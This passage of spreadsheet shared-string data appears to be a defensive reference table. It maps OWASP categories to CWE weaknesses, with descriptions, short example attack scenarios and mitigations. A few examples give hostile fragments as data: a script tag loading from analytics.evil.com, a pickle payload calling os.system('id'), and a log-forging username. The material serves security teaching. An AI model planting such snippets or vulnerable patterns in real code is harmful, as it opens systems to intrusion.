    <t>Login endpoint allows unlimited attempts — dictionary attack recovers weak passwords.</t>
  </si>
  <si>
    <t>OTP endpoint accepts unlimited guesses — 6-digit PIN brute-forced in 10,000 requests.</t>
  </si>
  <si>
    <t>API key enumeration: no lockout on key trial endpoints.</t>
  </si>
  <si>
    <t>Implement account lockout with progressive delay; use CAPTCHA after threshold; implement IP-based rate limiting; use SIEM to detect brute force patterns.</t>
  </si>
  <si>
    <t>CWE-308</t>
  </si>
  <si>
    <t>Use of Single-factor Authentication</t>
  </si>
  <si>
    <t>Relying on only one authentication factor leaves accounts vulnerable if that factor is compromised.</t>
  </si>
  <si>
    <t>Admin account with only password protection — compromised via phishing.</t>
  </si>
  <si>
    <t>VPN authentication via password only — no MFA requirement.</t>
  </si>
  <si>
    <t>SSH with password authentication enabled — vulnerable to brute force.</t>
  </si>
  <si>
    <t>Implement MFA for all privileged and sensitive accounts; use TOTP/FIDO2; make MFA mandatory not optional; monitor for MFA bypass attempts.</t>
  </si>
  <si>
    <t>CWE-309</t>
  </si>
  <si>
    <t>Use of Password System for Primary Authentication</t>
  </si>
  <si>
    <t>Sole reliance on passwords for authentication is insufficient for high-risk operations.</t>
  </si>
  <si>
    <t>Financial transaction authorised with just the session password.</t>
  </si>
  <si>
    <t>Code deployment pipeline secured only by username/password.</t>
  </si>
  <si>
    <t>Cloud admin console accessible with static password credentials.</t>
  </si>
  <si>
    <t>Supplement passwords with MFA; use risk-based authentication; implement step-up authentication for high-risk operations; adopt passwordless authentication (FIDO2) where possible.</t>
  </si>
  <si>
    <t>CWE-346</t>
  </si>
  <si>
    <t>Origin Validation Error</t>
  </si>
  <si>
    <t>The software doesn't properly verify the source of a communication.</t>
  </si>
  <si>
    <t>CORS allows any origin for authenticated API — cross-origin request from attacker site reads data.</t>
  </si>
  <si>
    <t>WebSocket server doesn't validate Origin header — any website can connect.</t>
  </si>
  <si>
    <t>Postmessage handler doesn't check event.origin — messages from any domain processed.</t>
  </si>
  <si>
    <t>Validate Origin/Referer headers; implement strict CORS allowlist; check event.origin in postMessage handlers; use CSRF tokens; implement SameSite cookie attribute.</t>
  </si>
  <si>
    <t>CWE-350</t>
  </si>
  <si>
    <t>Reliance on Reverse DNS for Security</t>
  </si>
  <si>
    <t>The product uses reverse DNS resolution for a security-critical action without verifying it is authoritative.</t>
  </si>
  <si>
    <t>IP-based access control uses reverse DNS lookup; attacker sets PTR record to match allowed hostname.</t>
  </si>
  <si>
    <t>Log analysis relies on reverse DNS to identify admin sessions — spoofed PTR records used to evade detection.</t>
  </si>
  <si>
    <t>Rate limiting bypassed by controlling PTR records to appear as a trusted host.</t>
  </si>
  <si>
    <t>Never use reverse DNS for security decisions; validate using forward DNS and match against the original IP; use cryptographic authentication instead of DNS-based identity.</t>
  </si>
  <si>
    <t>CWE-384</t>
  </si>
  <si>
    <t>Session Fixation</t>
  </si>
  <si>
    <t>Authenticating without regenerating session ID allows attacker to pre-set a session ID and hijack the session.</t>
  </si>
  <si>
    <t>Login doesn't call session_regenerate_id() — attacker pre-sets PHPSESSID, victim authenticates, attacker takes over.</t>
  </si>
  <si>
    <t>Java app doesn't invalidate and recreate session on login — fixed session ID hijacked.</t>
  </si>
  <si>
    <t>URL-based session ID (e.g., ?jsessionid=) set by attacker before login, reused after auth.</t>
  </si>
  <si>
    <t>Always regenerate session ID on authentication; invalidate old session; use HttpOnly/Secure cookies; avoid URL-based session IDs.</t>
  </si>
  <si>
    <t>CWE-521</t>
  </si>
  <si>
    <t>Weak Password Requirements</t>
  </si>
  <si>
    <t>The software doesn't enforce sufficiently strong password policies.</t>
  </si>
  <si>
    <t>Minimum 4 characters, no complexity — dictionary attacks succeed rapidly.</t>
  </si>
  <si>
    <t>Allows common passwords (123456, password) — compromised immediately.</t>
  </si>
  <si>
    <t>No check against breach password databases — pwned passwords accepted.</t>
  </si>
  <si>
    <t>Enforce minimum 12 characters; check against HaveIBeenPwned; allow passphrases; implement MFA; follow NIST SP 800-63B guidelines.</t>
  </si>
  <si>
    <t>CWE-613</t>
  </si>
  <si>
    <t>Insufficient Session Expiration</t>
  </si>
  <si>
    <t>Session tokens remain valid after logout or after long periods of inactivity.</t>
  </si>
  <si>
    <t>JWT token with 24-hour expiry reusable after user logs out — no server-side invalidation.</t>
  </si>
  <si>
    <t>Session cookie valid for 30 days with no inactivity timeout.</t>
  </si>
  <si>
    <t>OAuth refresh token never expires — perpetual access even if user account deleted.</t>
  </si>
  <si>
    <t>Implement server-side session invalidation on logout; use short-lived access tokens; implement idle timeout; maintain token revocation list; use refresh token rotation.</t>
  </si>
  <si>
    <t>CWE-620</t>
  </si>
  <si>
    <t>Unverified Password Change</t>
  </si>
  <si>
    <t>The software allows password changes without verifying the user's current password or identity.</t>
  </si>
  <si>
    <t>POST /changePassword accepts newPassword only, no currentPassword required.</t>
  </si>
  <si>
    <t>Password change endpoint accessible without active authentication session.</t>
  </si>
  <si>
    <t>CSRF attack on password change form — no current password required to change.</t>
  </si>
  <si>
    <t>Require current password for password changes; require re-authentication for sensitive account changes; implement CSRF protection; log and alert on password changes.</t>
  </si>
  <si>
    <t>CWE-640</t>
  </si>
  <si>
    <t>Weak Password Recovery Mechanism</t>
  </si>
  <si>
    <t>The password recovery mechanism is weak or predictable.</t>
  </si>
  <si>
    <t>Security questions (mother's maiden name, pet's name) answerable via social engineering.</t>
  </si>
  <si>
    <t>Password reset link never expires — old reset emails remain functional indefinitely.</t>
  </si>
  <si>
    <t>Reset token is the user's email address — trivially guessable.</t>
  </si>
  <si>
    <t>Use time-limited (15 min), single-use, CSPRNG-generated reset tokens; send via verified email/SMS; don't use security questions; implement MFA for account recovery.</t>
  </si>
  <si>
    <t>CWE-798</t>
  </si>
  <si>
    <t>Hard-coded Credentials</t>
  </si>
  <si>
    <t>The software uses hardcoded usernames and passwords for authentication.</t>
  </si>
  <si>
    <t>Backdoor account admin/admin hardcoded in application, persists across deployments.</t>
  </si>
  <si>
    <t>Device firmware contains hardcoded credentials discovered via strings command.</t>
  </si>
  <si>
    <t>API service authenticates to internal systems using credentials compiled into the binary.</t>
  </si>
  <si>
    <t>Remove all hardcoded credentials; use secrets managers for service credentials; scan code for credential patterns; implement credential rotation; use certificate-based auth where possible.</t>
  </si>
  <si>
    <t>CWE-940</t>
  </si>
  <si>
    <t>Improper Verification of Communication Channel Source</t>
  </si>
  <si>
    <t>The software doesn't adequately verify that a communication channel is from the expected entity.</t>
  </si>
  <si>
    <t>Service accepts requests from any internal IP without mTLS verification.</t>
  </si>
  <si>
    <t>Webhook processor doesn't verify HMAC signature — any caller can send events.</t>
  </si>
  <si>
    <t>Email-triggered action doesn't verify SPF/DKIM — spoofed email triggers privileged operation.</t>
  </si>
  <si>
    <t>Use mTLS for service-to-service communication; verify HMAC signatures on webhooks; implement SPF/DKIM/DMARC; use zero-trust network architecture.</t>
  </si>
  <si>
    <t>CWE-941</t>
  </si>
  <si>
    <t>Incorrectly Specified Destination in a Communication Channel</t>
  </si>
  <si>
    <t>The software specifies the destination of a communication channel incorrectly.</t>
  </si>
  <si>
    <t>SAML assertion consumer service URL not validated, allowing attacker to redirect assertions to their endpoint.</t>
  </si>
  <si>
    <t>OAuth redirect_uri not validated against pre-registered URIs — assertion sent to attacker.</t>
  </si>
  <si>
    <t>API endpoint URL hardcoded to test environment in production code, sending auth tokens to test server.</t>
  </si>
  <si>
    <t>Strictly validate all redirect_uri and ACS URL values against pre-registered allowlists; test OAuth flows for open redirect vulnerabilities; audit all communication channel endpoints.</t>
  </si>
  <si>
    <t>CWE-1390</t>
  </si>
  <si>
    <t>Weak Authentication</t>
  </si>
  <si>
    <t>The product uses an authentication mechanism that provides insufficient security for the level of risk.</t>
  </si>
  <si>
    <t>Single shared password used for all API clients, no per-client credentials.</t>
  </si>
  <si>
    <t>Knowledge-based authentication (KBA) only — answers guessable from social media.</t>
  </si>
  <si>
    <t>SMS-only OTP without fallback — vulnerable to SIM swapping attacks.</t>
  </si>
  <si>
    <t>Use strong, modern authentication mechanisms; implement MFA; use risk-based authentication; follow NIST SP 800-63B assurance levels; regularly review authentication strength.</t>
  </si>
  <si>
    <t>CWE-1391</t>
  </si>
  <si>
    <t>Use of Weak Credentials</t>
  </si>
  <si>
    <t>The product transmits or stores credentials that are too weak for security.</t>
  </si>
  <si>
    <t>API keys are 8-character alphanumeric strings — brute-forceable in reasonable time.</t>
  </si>
  <si>
    <t>Password minimum set to 6 characters — too weak for sensitive financial application.</t>
  </si>
  <si>
    <t>Service uses low-entropy GUID as authentication credential.</t>
  </si>
  <si>
    <t>Use cryptographically strong credentials (128+ bit entropy for API keys); enforce strong password policies; use adaptive authentication based on risk level; implement credential strength testing.</t>
  </si>
  <si>
    <t>CWE-1392</t>
  </si>
  <si>
    <t>Use of Default Credentials</t>
  </si>
  <si>
    <t>The product uses default credentials that are publicly known and never changed.</t>
  </si>
  <si>
    <t>Router with default admin/admin credentials never changed, accessed remotely.</t>
  </si>
  <si>
    <t>IoT device with default password 'admin' harvested for botnet (Mirai variant).</t>
  </si>
  <si>
    <t>Jenkins installed with default admin credentials exposed to internet.</t>
  </si>
  <si>
    <t>Require credential change on first use; disable default accounts; audit for default credentials with tools like Shodan searches; implement automated default credential detection.</t>
  </si>
  <si>
    <t>CWE-1393</t>
  </si>
  <si>
    <t>Use of Default Password</t>
  </si>
  <si>
    <t>The product uses a default password that is well-known or predictable.</t>
  </si>
  <si>
    <t>Database installed with default password 'root' or empty password never changed.</t>
  </si>
  <si>
    <t>VPN device with default password 'cisco' — listed in product documentation.</t>
  </si>
  <si>
    <t>WiFi AP with WPA2 password printed on device label, unchanged from factory setting.</t>
  </si>
  <si>
    <t>Force password change on initial setup; use unique per-device passwords; implement a password policy that prevents use of default/common passwords; audit all deployed systems.</t>
  </si>
  <si>
    <t>A08</t>
  </si>
  <si>
    <t>Software or Data Integrity Failures</t>
  </si>
  <si>
    <t>CWE-345</t>
  </si>
  <si>
    <t>Insufficient Verification of Data Authenticity</t>
  </si>
  <si>
    <t>The software doesn't verify the authenticity or integrity of data from untrusted sources.</t>
  </si>
  <si>
    <t>Software update downloaded and installed without verifying GPG/hash signature.</t>
  </si>
  <si>
    <t>Configuration loaded from user-supplied JSON without HMAC verification.</t>
  </si>
  <si>
    <t>Third-party data feed processed without integrity check — injected malicious data.</t>
  </si>
  <si>
    <t>Verify cryptographic signatures/HMACs on all externally-sourced data; implement signed software updates; use content integrity verification (SRI for web assets).</t>
  </si>
  <si>
    <t>CWE-353</t>
  </si>
  <si>
    <t>Missing Support for Integrity Check</t>
  </si>
  <si>
    <t>The software doesn't provide any mechanism to verify the integrity of data transmitted or stored.</t>
  </si>
  <si>
    <t>File transfer protocol used without any checksum or hash verification.</t>
  </si>
  <si>
    <t>API response has no integrity protection — MITM can modify data without detection.</t>
  </si>
  <si>
    <t>Database backup files stored without hash; corruption or tampering goes undetected.</t>
  </si>
  <si>
    <t>Implement integrity checks (SHA-256 hashes, HMACs) for all critical data transfers and storage; verify integrity before using data; use authenticated encryption.</t>
  </si>
  <si>
    <t>CWE-426</t>
  </si>
  <si>
    <t>Untrusted Search Path</t>
  </si>
  <si>
    <t>The software searches for critical resources using a path that includes attacker-controllable directories.</t>
  </si>
  <si>
    <t>Python script: import library — attacker places malicious library.py in CWD before execution.</t>
  </si>
  <si>
    <t>Executable searches PATH for 'openssl', attacker prepends malicious directory to PATH.</t>
  </si>
  <si>
    <t>DLL search order hijacking: application loads from current directory before System32.</t>
  </si>
  <si>
    <t>Use absolute paths for critical resources; control PATH environment in privileged processes; validate DLL load paths; use LoadLibraryEx with LOAD_WITH_ALTERED_SEARCH_PATH.</t>
  </si>
  <si>
    <t>CWE-427</t>
  </si>
  <si>
    <t>Uncontrolled Search Path Element</t>
  </si>
  <si>
    <t>The product uses a fixed or user-controlled search path to find a resource, but an element in the path can be modified by an attacker.</t>
  </si>
  <si>
    <t>LD_LIBRARY_PATH contains user-writable directory; attacker places malicious libssl.so there.</t>
  </si>
  <si>
    <t>PYTHONPATH includes /tmp which attacker controls, loading malicious module.</t>
  </si>
  <si>
    <t>Windows DLL search includes current directory — attacker drops malicious dll in working dir.</t>
  </si>
  <si>
    <t>Validate and restrict all search path elements; use absolute paths; clear dangerous environment variables before privileged operations; use signing for loaded modules.</t>
  </si>
  <si>
    <t>CWE-494</t>
  </si>
  <si>
    <t>Download of Code Without Integrity Check</t>
  </si>
  <si>
    <t>The software downloads code or configuration from a remote source without verifying its integrity.</t>
  </si>
  <si>
    <t>Update mechanism downloads .exe without verifying SHA-256 hash or code signature.</t>
  </si>
  <si>
    <t>npm install without package-lock.json — different package versions may be installed.</t>
  </si>
  <si>
    <t>Ansible playbook downloads shell script via HTTP and executes without hash check.</t>
  </si>
  <si>
    <t>Verify GPG signatures or hash checksums for all downloaded code; use package lock files; use HTTPS for downloads; implement code signing; pin dependency versions.</t>
  </si>
  <si>
    <t>CWE-502</t>
  </si>
  <si>
    <t>Deserialization of Untrusted Data</t>
  </si>
  <si>
    <t>The application deserialises data from untrusted sources, enabling remote code execution via crafted payloads.</t>
  </si>
  <si>
    <t>Java readObject() deserialises user-supplied data — ysoserial gadget chain achieves RCE.</t>
  </si>
  <si>
    <t>Python pickle.loads(user_data) — malicious pickle executes os.system('id').</t>
  </si>
  <si>
    <t>PHP unserialize($_COOKIE['data']) — POP chain leads to arbitrary file write.</t>
  </si>
  <si>
    <t>Never deserialise data from untrusted sources; use safe formats (JSON with schema validation); implement deserialization allowlisting; use Java agent deserialization filters.</t>
  </si>
  <si>
    <t>CWE-506</t>
  </si>
  <si>
    <t>Embedded Malicious Code</t>
  </si>
  <si>
    <t>The software contains code that is intentionally malicious.</t>
  </si>
  <si>
    <t>npm package contains obfuscated code that exfiltrates environment variables to external server.</t>
  </si>
  <si>
    <t>Typosquatted PyPI package 'requets' contains backdoor mimicking popular 'requests' library.</t>
  </si>
  <si>
    <t>Malicious code inserted into open source dependency via compromised maintainer account.</t>
  </si>
  <si>
    <t>Review dependencies for suspicious code; use SCA tools; verify package checksums; monitor for typosquatting; implement strict package version pinning.</t>
  </si>
  <si>
    <t>CWE-509</t>
  </si>
  <si>
    <t>Replicating Malicious Code (Virus or Worm)</t>
  </si>
  <si>
    <t>The product contains code that can replicate itself or propagate to other systems.</t>
  </si>
  <si>
    <t>Self-propagating npm worm harvests npm tokens and publishes malicious versions of accessible packages.</t>
  </si>
  <si>
    <t>Malware in compromised CI/CD pipeline injects itself into built artifacts for propagation.</t>
  </si>
  <si>
    <t>Supply chain worm modifies install scripts to infect developer workstations.</t>
  </si>
  <si>
    <t>Implement integrity checks on all build artifacts; use isolated build environments; monitor for unusual package publishing activity; implement SCA scanning in CI/CD; use code signing.</t>
  </si>
  <si>
    <t>CWE-565</t>
  </si>
  <si>
    <t>Reliance on Cookies without Integrity Checking</t>
  </si>
  <si>
    <t>Security decisions are based on cookie values without verifying their integrity.</t>
  </si>
  <si>
    <t>Cookie role=admin read and trusted without HMAC validation — any user can set admin role.</t>
  </si>
  <si>
    <t>Shopping cart total stored in cookie and used server-side without re-calculating.</t>
  </si>
  <si>
    <t>isAuthenticated=true in cookie accepted without cross-referencing server session.</t>
  </si>
  <si>
    <t>Never trust cookie values for security decisions without HMAC validation; store sensitive state server-side; use signed cookies; re-derive state from authoritative sources.</t>
  </si>
  <si>
    <t>CWE-784</t>
  </si>
  <si>
    <t>Cookie Integrity Decision Without Validation</t>
  </si>
  <si>
    <t>Security-sensitive decisions (auth, authorisation) rely on cookie values that haven't been integrity-checked.</t>
  </si>
  <si>
    <t>Premium feature gated by cookie premium=true without server-side verification.</t>
  </si>
  <si>
    <t>Admin mode enabled by admin=1 cookie without session-based validation.</t>
  </si>
  <si>
    <t>Payment bypass: cookie paid=true set by attacker, server doesn't verify against payment record.</t>
  </si>
  <si>
    <t>Validate all security-relevant cookie values against server-side state; use cryptographically signed cookies; implement defence-in-depth with server-side re-verification.</t>
  </si>
  <si>
    <t>CWE-829</t>
  </si>
  <si>
    <t>Inclusion from Untrusted Control Sphere</t>
  </si>
  <si>
    <t>The software imports functionality from an external source not within its intended control sphere.</t>
  </si>
  <si>
    <t>CDN-hosted jQuery from uncontrolled URL — CDN compromised, malicious version served.</t>
  </si>
  <si>
    <t>npm postinstall script runs arbitrary code from maintainer-controlled package.</t>
  </si>
  <si>
    <t>Subresource Integrity not used for third-party scripts — MITM injects malicious script.</t>
  </si>
  <si>
    <t>Use Subresource Integrity (SRI) for all external scripts; self-host critical dependencies; audit third-party code; implement strict CSP; use package lock files; pin dependency versions.</t>
  </si>
  <si>
    <t>CWE-830</t>
  </si>
  <si>
    <t>Inclusion of Web Functionality from Untrusted Source</t>
  </si>
  <si>
    <t>The web application includes scripts, frames, or other content from untrusted sources.</t>
  </si>
  <si>
    <t>&lt;script src='http://analytics.evil.com/track.js'&gt; — no HTTPS, no SRI.</t>
  </si>
  <si>
    <t>iframe from third-party domain injects content into application page.</t>
  </si>
  <si>
    <t>Advertisement script from third-party network gains access to page DOM and cookies.</t>
  </si>
  <si>
    <t>Use SRI for all external resources; implement strict CSP; self-host dependencies; use iframe sandboxing; audit third-party integrations.</t>
  </si>
  <si>
    <t>CWE-915</t>
  </si>
  <si>
    <t>Improperly Controlled Modification of Dynamically-Determined Object Attributes</t>
  </si>
  <si>
    <t>User input specifies object attribute names to set, allowing modification of security-sensitive attributes.</t>
  </si>
  <si>
    <t>Mass assignment: User.update(params.permit!) allows setting is_admin=true from request.</t>
  </si>
  <si>
    <t>MongoDB query: db.users.update({_id:id}, {$set: userInput}) — userInput sets any field.</t>
  </si>
  <si>
    <t>Python setattr(obj, user_supplied_attr, value) — attacker sets __class__ or privileged attribute.</t>
  </si>
  <si>
    <t>Use allowlists for mass-assignable attributes; use separate DTOs/forms for user input; validate attribute names against allowlist; never use setattr/update with unfiltered user input.</t>
  </si>
  <si>
    <t>CWE-926</t>
  </si>
  <si>
    <t>Improper Export of Android Application Components</t>
  </si>
  <si>
    <t>Android application components (activities, services, providers) are exported inappropriately.</t>
  </si>
  <si>
    <t>Content provider exported without permission requirement — any app can read sensitive data.</t>
  </si>
  <si>
    <t>Activity exported without android:exported=false — external app launches it directly.</t>
  </si>
  <si>
    <t>BroadcastReceiver exported, allows any app to trigger sensitive actions via intent.</t>
  </si>
  <si>
    <t>Set android:exported=false for all components not meant for external use; use permission requirements; review AndroidManifest.xml; test inter-app communication with static and dynamic analysis.</t>
  </si>
  <si>
    <t>A09</t>
  </si>
  <si>
    <t>Security Logging and Alerting Failures</t>
  </si>
  <si>
    <t>CWE-117</t>
  </si>
  <si>
    <t>Improper Output Neutralization for Logs</t>
  </si>
  <si>
    <t>User input written to log files without sanitisation enables log injection attacks.</t>
  </si>
  <si>
    <t>Username 'admin\n127.0.0.1 - - [GET /admin 200' injected into access log, forging entries.</t>
  </si>
  <si>
    <t>Log injection: error message with CRLF sequences creates fake log events.</t>
  </si>
  <si>
    <t>User-supplied callback URL logged without sanitisation — URL contains log-forging payload.</t>
  </si>
  <si>
    <t>Sanitise all logged user input; encode newlines and special characters; use structured logging (JSON) to prevent injection; implement log integrity monitoring.</t>
  </si>
  <si>
    <t>CWE-221</t>
  </si>
  <si>
    <t>Information Loss or Omission</t>
  </si>
  <si>
    <t>The software fails to capture, record, or transmit important information, causing loss of event context.</t>
  </si>
  <si>
    <t>Transaction logs dropped during high-load event — attacker times attack during peak to avoid detection.</t>
  </si>
  <si>
    <t>Log rotation overwrites logs before SIEM ingestion, losing evidence of attack.</t>
  </si>
  <si>
    <t>Async logging queue overflow silently drops security events during DoS attack.</t>
  </si>
  <si>
    <t>Use reliable, synchronous logging for security events; implement log buffering with overflow alerting; use centralised SIEM with guaranteed delivery; set appropriate log retention policies.</t>
  </si>
  <si>
    <t>CWE-223</t>
  </si>
  <si>
    <t>Omission of Security-relevant Information</t>
  </si>
  <si>
    <t>Security-relevant events are not logged, making attack detection impossible.</t>
  </si>
  <si>
    <t>Failed authentication attempts not logged — brute force attack goes undetected.</t>
  </si>
  <si>
    <t>Access control denials not logged — IDOR exploitation invisible in logs.</t>
  </si>
  <si>
    <t>Administrative actions performed without audit trail — insider threat undetectable.</t>
  </si>
  <si>
    <t>Log all security events: failed auth, access denials, privilege changes, data access; include user, IP, timestamp, resource; use centralised SIEM; conduct log coverage audits.</t>
  </si>
  <si>
    <t>CWE-532</t>
  </si>
  <si>
    <t>Insertion of Sensitive Information into Log File</t>
  </si>
  <si>
    <t>Sensitive data (passwords, tokens, PII) is written to log files.</t>
  </si>
  <si>
    <t>Debug log: AUTH: username=admin password=hunter2 written to /var/log/app.log.</t>
  </si>
  <si>
    <t>Full HTTP request logged including Authorization header with Bearer token.</t>
  </si>
  <si>
    <t>Error log: Connection failed: host=db, user=root, password=dbpass logged in plaintext.</t>
  </si>
  <si>
    <t>Define logging data classification; mask/redact sensitive fields before logging; audit log statements for sensitive data; use structured logging with field-level redaction; implement log access controls.</t>
  </si>
  <si>
    <t>CWE-778</t>
  </si>
  <si>
    <t>Insufficient Logging</t>
  </si>
  <si>
    <t>The software doesn't log sufficient information to reconstruct security events or support incident investigation.</t>
  </si>
  <si>
    <t>Successful logins logged but not failed attempts — brute force not detectable.</t>
  </si>
  <si>
    <t>File access logged without the requester's identity — impossible to attribute to user.</t>
  </si>
  <si>
    <t>Database queries not logged — SQL injection exploitation leaves no trace.</t>
  </si>
  <si>
    <t>Implement comprehensive security logging (OWASP Logging Cheat Sheet); log who, what, when, where; use log aggregation (ELK, Splunk); define minimum logging requirements; test log completeness.</t>
  </si>
  <si>
    <t>A10</t>
  </si>
  <si>
    <t>Mishandling of Exceptional Conditions</t>
  </si>
  <si>
    <t>CWE-209</t>
  </si>
  <si>
    <t>Error Message Containing Sensitive Information</t>
  </si>
  <si>
    <t>Detailed error messages reveal sensitive server-side information to users.</t>
  </si>
  <si>
    <t>Database error: SQLSTATE[42S02]: Table 'prod.users' doesn't exist with full query shown to user.</t>
  </si>
  <si>
    <t>Java exception exposes class path: java.io.FileNotFoundException: /opt/app/config/prod.properties.</t>
  </si>
  <si>
    <t>Framework debug page exposes environment variables and session data on unhandled exception.</t>
  </si>
  <si>
    <t>Use generic error messages for end users; log detailed errors server-side with correlation IDs; configure error pages in web server; implement global exception handler.</t>
  </si>
  <si>
    <t>CWE-215</t>
  </si>
  <si>
    <t>Sensitive Information in Debugging Code</t>
  </si>
  <si>
    <t>Debugging code left in production outputs sensitive information.</t>
  </si>
  <si>
    <t>console.log('User password:', password) left in production JavaScript.</t>
  </si>
  <si>
    <t>PHP var_dump($_SESSION) on error page reveals session data in production.</t>
  </si>
  <si>
    <t>Debug print statement: print('Processing payment:', card_number) in production payment handler.</t>
  </si>
  <si>
    <t>Remove all debug output before production; use conditional debug flags; implement code review checklists; scan for debug statements with static analysis.</t>
  </si>
  <si>
    <t>CWE-234</t>
  </si>
  <si>
    <t>Failure to Handle Missing Parameter</t>
  </si>
  <si>
    <t>The software fails to handle the case where an expected input parameter is absent.</t>
  </si>
  <si>
    <t>API crashes with NullPointerException when optional 'userId' parameter omitted, leaking stack trace.</t>
  </si>
  <si>
    <t>XML parser reads absent node as null and passes it to SQL query, causing injection.</t>
  </si>
  <si>
    <t>Missing HTTP header causes application to skip authentication check entirely.</t>
  </si>
  <si>
    <t>Validate presence of all required parameters before processing; use default values for optional parameters; handle missing parameters gracefully with appropriate error responses.</t>
  </si>
  <si>
    <t>CWE-235</t>
  </si>
  <si>
    <t>Improper Handling of Extra Parameters</t>
  </si>
  <si>
    <t>The software does not properly handle extra or unexpected parameters.</t>
  </si>
  <si>
    <t>Extra parameters injected into payment form processed by server, overriding amount.</t>
  </si>
  <si>
    <t>Mass assignment via extra JSON fields in PATCH request sets admin=true.</t>
  </si>
  <si>
    <t>GraphQL query with extra fields returns data beyond intended scope.</t>
  </si>
  <si>
    <t>Whitelist accepted parameters; use strict model binding; validate parameter count and names; test with extra/unexpected parameter injection; use API schema validation.</t>
  </si>
  <si>
    <t>CWE-248</t>
  </si>
  <si>
    <t>Uncaught Exception</t>
  </si>
  <si>
    <t>An exception is thrown but not handled, causing unexpected or insecure termination.</t>
  </si>
  <si>
    <t>Unhandled NullPointerException in auth filter causes security check to be skipped with fail-open behaviour.</t>
  </si>
  <si>
    <t>Uncaught exception in payment processing leaves transaction in inconsistent state.</t>
  </si>
  <si>
    <t>Uncaught exception in session management causes application to restart, logging all users out (DoS).</t>
  </si>
  <si>
    <t>Implement global exception handlers; never leave exceptions unhandled in security-critical paths; use fail-secure defaults; test exception paths explicitly; log all uncaught exceptions.</t>
  </si>
  <si>
    <t>CWE-252</t>
  </si>
  <si>
    <t>Unchecked Return Value</t>
  </si>
  <si>
    <t>Return values or error conditions from function calls are not checked.</t>
  </si>
  <si>
    <t>fwrite() return value not checked — partial write treated as success.</t>
  </si>
  <si>
    <t>malloc() return not checked — NULL pointer dereference if allocation fails.</t>
  </si>
  <si>
    <t>System call return code ignored — privileged operation failure not detected.</t>
  </si>
  <si>
    <t>Always check return values; use compiler warnings for unchecked return values; use RAII in C++; use Result/Optional types in modern languages; test error paths explicitly.</t>
  </si>
  <si>
    <t>CWE-274</t>
  </si>
  <si>
    <t>Improper Handling of Insufficient Privileges</t>
  </si>
  <si>
    <t>The software does not handle the situation where an operation fails due to insufficient privileges.</t>
  </si>
  <si>
    <t>Application silently continues after privilege check failure, executing partial privileged operation.</t>
  </si>
  <si>
    <t>File write failure due to permissions silently ignored, causing data loss without notification.</t>
  </si>
  <si>
    <t>Service escalates to root when encountering permission error rather than failing safely.</t>
  </si>
  <si>
    <t>Explicitly handle insufficient privilege errors; use fail-secure defaults; log all privilege failures; design systems to degrade gracefully; test behaviour under reduced privileges.</t>
  </si>
  <si>
    <t>CWE-280</t>
  </si>
  <si>
    <t>Improper Handling of Insufficient Permissions or Privileges</t>
  </si>
  <si>
    <t>The software doesn't properly handle cases where insufficient permissions prevent an operation.</t>
  </si>
  <si>
    <t>Application silently succeeds when write operation fails due to permissions, causing data loss.</t>
  </si>
  <si>
    <t>Access denied exception caught and silently ignored, allowing partial state change.</t>
  </si>
  <si>
    <t>Read failure returns empty result instead of error, leading to logic bypass.</t>
  </si>
  <si>
    <t>Explicitly check and handle permission errors; return appropriate error codes; log permission failures; design fail-secure flows; test all paths with reduced privileges.</t>
  </si>
  <si>
    <t>CWE-369</t>
  </si>
  <si>
    <t>Divide By Zero</t>
  </si>
  <si>
    <t>The software divides a value by zero, causing a crash or unexpected behaviour.</t>
  </si>
  <si>
    <t>API endpoint calculates average: sum/count — when count=0 causes server error exposing stack trace.</t>
  </si>
  <si>
    <t>Pagination code: page_size = total/pages — attacker supplies pages=0, causing crash.</t>
  </si>
  <si>
    <t>Rate limiting calculation divides by elapsed time; if elapsed=0 causes arithmetic error, bypassing limit.</t>
  </si>
  <si>
    <t>Always check for zero divisors before division; handle division by zero explicitly; use safe math libraries; test with boundary values including zero.</t>
  </si>
  <si>
    <t>CWE-390</t>
  </si>
  <si>
    <t>Detection of Error Without Action</t>
  </si>
  <si>
    <t>The code detects an error but takes no action, leading to unexpected or dangerous subsequent execution.</t>
  </si>
  <si>
    <t>try/except Exception: pass — authentication failure silently ignored, execution continues.</t>
  </si>
  <si>
    <t>if (result == null) {} — null result not handled, subsequent NullPointerException bypasses check.</t>
  </si>
  <si>
    <t>Error flag checked but not acted upon — operation proceeds regardless of error state.</t>
  </si>
  <si>
    <t>Always handle detected errors appropriately; use fail-secure defaults; implement linting rules against empty catch blocks; conduct code review focused on error handling.</t>
  </si>
  <si>
    <t>CWE-391</t>
  </si>
  <si>
    <t>Unchecked Error Condition</t>
  </si>
  <si>
    <t>chmod() return value not checked — file permissions assumed set even if operation failed.</t>
  </si>
  <si>
    <t>Database transaction commit return not checked — failed commit treated as success.</t>
  </si>
  <si>
    <t>Cryptographic operation error silently ignored — operation continues with invalid/partial state.</t>
  </si>
  <si>
    <t>Check all error conditions and return values; use exceptions rather than error codes where possible; write tests that verify error conditions are handled; use static analysis.</t>
  </si>
  <si>
    <t>CWE-394</t>
  </si>
  <si>
    <t>Unexpected Status Code or Return Value</t>
  </si>
  <si>
    <t>The software does not handle the case where an unexpected status code or return value is received.</t>
  </si>
  <si>
    <t>HTTP 429 (rate limit) treated as success, causing infinite retry loop causing DoS.</t>
  </si>
  <si>
    <t>HTTP 301 redirect followed automatically to attacker-controlled URL without validation.</t>
  </si>
  <si>
    <t>Unexpected HTTP 204 (No Content) treated as error by client, causing retry of state-changing operation.</t>
  </si>
  <si>
    <t>Explicitly handle all expected and unexpected status codes; use allowlist of acceptable responses; implement timeout and retry logic with backoff; test with unexpected response codes.</t>
  </si>
  <si>
    <t>CWE-396</t>
  </si>
  <si>
    <t>Declaration of Catch for Generic Exception</t>
  </si>
  <si>
    <t>The code catches a generic exception type, masking specific error conditions.</t>
  </si>
  <si>
    <t>catch(Exception e) {} catches all exceptions including SecurityException, silently bypassing security check.</t>
  </si>
  <si>
    <t>Generic catch block handles both NullPointerException and AuthenticationException identically.</t>
  </si>
  <si>
    <t>Catching Throwable swallows OutOfMemoryError, masking resource exhaustion attack.</t>
  </si>
  <si>
    <t>Catch specific exception types; handle each exception type appropriately; use specific exception hierarchies; never catch and silently ignore exceptions in security-critical code.</t>
  </si>
  <si>
    <t>CWE-397</t>
  </si>
  <si>
    <t>Declaration of Throws for Generic Exception</t>
  </si>
  <si>
    <t>The method declares that it throws a generic exception, preventing callers from handling specific conditions.</t>
  </si>
  <si>
    <t>public void authenticate() throws Exception — callers cannot distinguish auth failure from network error.</t>
  </si>
  <si>
    <t>throws RuntimeException in security method prevents caller from knowing if it's a SecurityException.</t>
  </si>
  <si>
